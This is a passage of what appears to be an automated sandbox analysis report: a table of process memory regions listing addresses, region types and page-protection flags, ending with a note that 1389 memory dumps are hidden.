|
heap
|
page read and write
|
||
DC4000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A658000
|
heap
|
page read and write
|
||
28C49791000
|
heap
|
page read and write
|
||
27B0000
|
heap
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
2750000
|
heap
|
page read and write
|
||
2ABD000
|
direct allocation
|
page read and write
|
||
31D0000
|
heap
|
page read and write
|
||
28C48CF4000
|
heap
|
page read and write
|
||
A1F9000
|
direct allocation
|
page read and write
|
||
B4A3000
|
direct allocation
|
page read and write
|
||
2767000
|
heap
|
page read and write
|
||
D65E000
|
direct allocation
|
page read and write
|
||
23979A2A000
|
heap
|
page read and write
|
||
927B000
|
unkown
|
page read and write
|
||
28C4A550000
|
heap
|
page read and write
|
||
A213000
|
direct allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
220D37C7000
|
heap
|
page read and write
|
||
2C9F000
|
stack
|
page read and write
|
||
960D000
|
unkown
|
page readonly
|
||
F2A000
|
heap
|
page read and write
|
||
2B32000
|
direct allocation
|
page read and write
|
||
A640000
|
direct allocation
|
page read and write
|
||
94E7000
|
unkown
|
page readonly
|
||
3397000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C49FE6000
|
heap
|
page read and write
|
||
28C48D15000
|
heap
|
page read and write
|
||
2A77000
|
direct allocation
|
page read and write
|
||
D7C0000
|
heap
|
page read and write
|
||
28C48D0E000
|
heap
|
page read and write
|
||
2970000
|
heap
|
page read and write
|
||
3370000
|
heap
|
page read and write
|
||
41C000
|
unkown
|
page execute read
|
||
7D59000
|
unkown
|
page execute read
|
||
D7DA000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
1C44D370000
|
heap
|
page read and write
|
||
956D000
|
unkown
|
page readonly
|
||
28C48D82000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48D04000
|
heap
|
page read and write
|
||
23979A31000
|
heap
|
page read and write
|
||
94DD000
|
unkown
|
page readonly
|
||
2C61000
|
heap
|
page read and write
|
||
28C423FD000
|
heap
|
page read and write
|
||
951F000
|
unkown
|
page readonly
|
||
2A10000
|
heap
|
page read and write
|
||
28C4953E000
|
heap
|
page read and write
|
||
28C48792000
|
heap
|
page read and write
|
||
D838000
|
heap
|
page read and write
|
||
9642000
|
unkown
|
page readonly
|
||
2C61000
|
heap
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
28C4A5D4000
|
heap
|
page read and write
|
||
23979A35000
|
heap
|
page read and write
|
||
9615000
|
unkown
|
page readonly
|
||
28C49E18000
|
heap
|
page read and write
|
||
28C4911E000
|
heap
|
page read and write
|
||
2A80000
|
heap
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
95E6000
|
unkown
|
page readonly
|
||
28C48CDC000
|
heap
|
page read and write
|
||
28C49EDE000
|
heap
|
page read and write
|
||
2C72000
|
heap
|
page read and write
|
||
28C49F20000
|
heap
|
page read and write
|
||
B95A3FE000
|
stack
|
page read and write
|
||
28C49FA4000
|
heap
|
page read and write
|
||
B5EF000
|
direct allocation
|
page read and write
|
||
2C80000
|
heap
|
page read and write
|
||
3255000
|
heap
|
page read and write
|
||
D877000
|
heap
|
page read and write
|
||
AD000
|
stack
|
page read and write
|
||
28C49370000
|
heap
|
page read and write
|
||
2766000
|
heap
|
page read and write
|
||
28C49F20000
|
heap
|
page read and write
|
||
28C423C4000
|
heap
|
page read and write
|
||
28C49B2C000
|
heap
|
page read and write
|
||
D8C4000
|
heap
|
page read and write
|
||
2756000
|
heap
|
page read and write
|
||
28C49E18000
|
heap
|
page read and write
|
||
959B000
|
unkown
|
page readonly
|
||
AF8000
|
unkown
|
page read and write
|
||
2FBB000
|
heap
|
page read and write
|
||
28C4A27B000
|
heap
|
page read and write
|
||
28C49A66000
|
heap
|
page read and write
|
||
28C4A868000
|
heap
|
page read and write
|
||
1C44D40D000
|
heap
|
page read and write
|
||
28C4A7A2000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
220D37DF000
|
heap
|
page read and write
|
||
31F0000
|
heap
|
page read and write
|
||
220D3834000
|
heap
|
page read and write
|
||
9281000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
263D000
|
stack
|
page read and write
|
||
28C49A24000
|
heap
|
page read and write
|
||
28C48CDC000
|
heap
|
page read and write
|
||
28C48CEE000
|
heap
|
page read and write
|
||
D65E000
|
direct allocation
|
page read and write
|
||
23E0000
|
heap
|
page read and write
|
||
AF36000
|
trusted library allocation
|
page read and write
|
||
28C4909A000
|
heap
|
page read and write
|
||
422000
|
unkown
|
page execute read
|
||
B69E000
|
direct allocation
|
page read and write
|
||
28C4A5D4000
|
heap
|
page read and write
|
||
2FD6000
|
heap
|
page read and write
|
||
28C48F0E000
|
heap
|
page read and write
|
||
2778000
|
heap
|
page read and write
|
||
28C48248000
|
heap
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
28C4A826000
|
heap
|
page read and write
|
||
A215000
|
direct allocation
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
29EB000
|
heap
|
page read and write
|
||
28C48CE0000
|
heap
|
page read and write
|
||
28C458F3000
|
heap
|
page read and write
|
||
9266000
|
unkown
|
page read and write
|
||
28C48CFF000
|
heap
|
page read and write
|
||
1C44D3AD000
|
heap
|
page read and write
|
||
964E000
|
unkown
|
page readonly
|
||
12D000
|
stack
|
page read and write
|
||
B5F6000
|
direct allocation
|
page read and write
|
||
28C49B6E000
|
heap
|
page read and write
|
||
31F0000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
D88B000
|
heap
|
page read and write
|
||
28C49D52000
|
heap
|
page read and write
|
||
3850000
|
heap
|
page read and write
|
||
28C4A8AB000
|
heap
|
page read and write
|
||
D8C2000
|
heap
|
page read and write
|
||
953B000
|
unkown
|
page readonly
|
||
267E000
|
stack
|
page read and write
|
||
28C48CED000
|
heap
|
page read and write
|
||
9566000
|
unkown
|
page readonly
|
||
2C61000
|
heap
|
page read and write
|
||
5480000
|
unkown
|
page readonly
|
||
28C48D41000
|
heap
|
page read and write
|
||
28C4A6DC000
|
heap
|
page read and write
|
||
28C423CA000
|
heap
|
page read and write
|
||
28C4246E000
|
heap
|
page read and write
|
||
951C000
|
unkown
|
page readonly
|
||
28C4A06A000
|
heap
|
page read and write
|
||
9573000
|
unkown
|
page readonly
|
||
28C46CF3000
|
heap
|
page read and write
|
||
B959F2C000
|
stack
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
6FCD1000
|
unkown
|
page execute read
|
||
28C49C34000
|
heap
|
page read and write
|
||
2E7D000
|
stack
|
page read and write
|
||
AD2000
|
unkown
|
page read and write
|
||
220D3980000
|
heap
|
page read and write
|
||
2B73000
|
direct allocation
|
page read and write
|
||
28C48350000
|
heap
|
page read and write
|
||
28C497D2000
|
heap
|
page read and write
|
||
27A0000
|
heap
|
page read and write
|
||
28C4A27A000
|
heap
|
page read and write
|
||
E8E000
|
heap
|
page read and write
|
||
1327C000
|
stack
|
page read and write
|
||
333B000
|
heap
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
A538000
|
direct allocation
|
page read and write
|
||
28C48D01000
|
heap
|
page read and write
|
||
2B00000
|
heap
|
page read and write
|
||
9184000
|
unkown
|
page read and write
|
||
FFCF0000
|
direct allocation
|
page read and write
|
||
23979960000
|
heap
|
page read and write
|
||
23979A08000
|
heap
|
page read and write
|
||
28C48CBA000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A978000
|
heap
|
page read and write
|
||
3020000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
289A000
|
heap
|
page read and write
|
||
2AF8000
|
direct allocation
|
page read and write
|
||
28FA000
|
heap
|
page read and write
|
||
122D0000
|
heap
|
page read and write
|
||
28C485C4000
|
heap
|
page read and write
|
||
28C4932E000
|
heap
|
page read and write
|
||
2DFE000
|
unkown
|
page read and write
|
||
220D3A90000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
220D7210000
|
trusted library allocation
|
page read and write
|
||
A204000
|
direct allocation
|
page read and write
|
||
9293000
|
unkown
|
page write copy
|
||
23979A1A000
|
heap
|
page read and write
|
||
28C48541000
|
heap
|
page read and write
|
||
9199000
|
unkown
|
page read and write
|
||
9294000
|
unkown
|
page readonly
|
||
274B000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
1C44D3DC000
|
heap
|
page read and write
|
||
28C49790000
|
heap
|
page read and write
|
||
91AE000
|
unkown
|
page write copy
|
||
E96000
|
heap
|
page read and write
|
||
263E000
|
unkown
|
page read and write
|
||
501EEFE000
|
stack
|
page read and write
|
||
924A000
|
unkown
|
page read and write
|
||
2886000
|
heap
|
page read and write
|
||
28C423C7000
|
heap
|
page read and write
|
||
28C48048000
|
heap
|
page read and write
|
||
501F6FB000
|
stack
|
page read and write
|
||
28C4A340000
|
heap
|
page read and write
|
||
28C49856000
|
heap
|
page read and write
|
||
28C48C78000
|
heap
|
page read and write
|
||
28C4A760000
|
heap
|
page read and write
|
||
13500000
|
trusted library allocation
|
page read and write
|
||
D8BA000
|
heap
|
page read and write
|
||
603A000
|
unkown
|
page execute read
|
||
9579000
|
unkown
|
page readonly
|
||
D5C0000
|
direct allocation
|
page read and write
|
||
238E000
|
unkown
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
D7E9000
|
heap
|
page read and write
|
||
239799F1000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C49436000
|
heap
|
page read and write
|
||
2776000
|
heap
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C491A2000
|
heap
|
page read and write
|
||
23DE000
|
unkown
|
page read and write
|
||
28C48D07000
|
heap
|
page read and write
|
||
D85A000
|
heap
|
page read and write
|
||
28C4889B000
|
heap
|
page read and write
|
||
28C48960000
|
heap
|
page read and write
|
||
EAA000
|
heap
|
page read and write
|
||
232D000
|
stack
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
29DE000
|
stack
|
page read and write
|
||
28C484DC000
|
heap
|
page read and write
|
||
28C4A2FE000
|
heap
|
page read and write
|
||
28C4A593000
|
heap
|
page read and write
|
||
B640000
|
direct allocation
|
page read and write
|
||
28C42400000
|
heap
|
page read and write
|
||
28C4974E000
|
heap
|
page read and write
|
||
9656000
|
unkown
|
page readonly
|
||
28C42B51000
|
heap
|
page read and write
|
||
28C4A616000
|
heap
|
page read and write
|
||
28C48E8A000
|
heap
|
page read and write
|
||
1C44D3DB000
|
heap
|
page read and write
|
||
28F7000
|
heap
|
page read and write
|
||
B652000
|
direct allocation
|
page read and write
|
||
28C496CA000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48006000
|
heap
|
page read and write
|
||
220D37CB000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
9542000
|
unkown
|
page readonly
|
||
B6D8000
|
direct allocation
|
page read and write
|
||
501EDFE000
|
stack
|
page read and write
|
||
5492000
|
unkown
|
page execute and read and write
|
||
28CB000
|
heap
|
page read and write
|
||
E96000
|
heap
|
page read and write
|
||
2778000
|
heap
|
page read and write
|
||
348F000
|
stack
|
page read and write
|
||
2B14000
|
direct allocation
|
page read and write
|
||
28C48491000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2FEA000
|
heap
|
page read and write
|
||
28C423FD000
|
heap
|
page read and write
|
||
A570000
|
direct allocation
|
page read and write
|
||
6FCD0000
|
unkown
|
page readonly
|
||
617D000
|
unkown
|
page execute read
|
||
2880000
|
heap
|
page read and write
|
||
220D3837000
|
heap
|
page read and write
|
||
2DA0000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
320E000
|
unkown
|
page read and write
|
||
28C48CEC000
|
heap
|
page read and write
|
||
7E3F000
|
unkown
|
page execute read
|
||
28C48CF9000
|
heap
|
page read and write
|
||
28C4A3C4000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
336A000
|
heap
|
page read and write
|
||
28C4A238000
|
heap
|
page read and write
|
||
32C9000
|
heap
|
page read and write
|
||
28C49BF2000
|
heap
|
page read and write
|
||
965F000
|
unkown
|
page readonly
|
||
28C4970C000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C423EE000
|
heap
|
page read and write
|
||
2C50000
|
heap
|
page read and write
|
||
D7DE000
|
heap
|
page read and write
|
||
2B8F000
|
stack
|
page read and write
|
||
4AC000
|
unkown
|
page execute read
|
||
2FEA000
|
heap
|
page read and write
|
||
28C48CF4000
|
heap
|
page read and write
|
||
B19E000
|
stack
|
page read and write
|
||
28C49A67000
|
heap
|
page read and write
|
||
AF31000
|
trusted library allocation
|
page read and write
|
||
28C48CE9000
|
heap
|
page read and write
|
||
2ABF000
|
unkown
|
page read and write
|
||
28C4A978000
|
heap
|
page read and write
|
||
B6BB000
|
direct allocation
|
page read and write
|
||
1C44D3B0000
|
heap
|
page read and write
|
||
28C49160000
|
heap
|
page read and write
|
||
28C4A8AA000
|
heap
|
page read and write
|
||
28F7000
|
heap
|
page read and write
|
||
28C423EB000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
915C000
|
unkown
|
page read and write
|
||
6AD7000
|
unkown
|
page execute read
|
||
54AC000
|
unkown
|
page execute read
|
||
28EF000
|
unkown
|
page read and write
|
||
28C49BB0000
|
heap
|
page read and write
|
||
28C4A382000
|
heap
|
page read and write
|
||
2FE6000
|
heap
|
page read and write
|
||
2840000
|
heap
|
page read and write
|
||
9135000
|
unkown
|
page execute read
|
||
2AD0000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2AFE000
|
stack
|
page read and write
|
||
273E000
|
stack
|
page read and write
|
||
2B36000
|
heap
|
page read and write
|
||
36AF000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C49DD6000
|
heap
|
page read and write
|
||
37EF000
|
stack
|
page read and write
|
||
CB3A000
|
trusted library allocation
|
page read and write
|
||
283F000
|
unkown
|
page read and write
|
||
28C47FC4000
|
heap
|
page read and write
|
||
356F000
|
stack
|
page read and write
|
||
2A06000
|
heap
|
page read and write
|
||
28C43151000
|
heap
|
page read and write
|
||
2BDF000
|
stack
|
page read and write
|
||
A607000
|
direct allocation
|
page read and write
|
||
28C4868A000
|
heap
|
page read and write
|
||
2ACB000
|
direct allocation
|
page read and write
|
||
2779000
|
heap
|
page read and write
|
||
220D39A0000
|
heap
|
page read and write
|
||
329B000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
10FF000
|
stack
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
DABF000
|
stack
|
page read and write
|
||
28C423FD000
|
heap
|
page read and write
|
||
289A000
|
heap
|
page read and write
|
||
1313C000
|
stack
|
page read and write
|
||
28C48648000
|
heap
|
page read and write
|
There are 1389 hidden memdumps, click here to show them.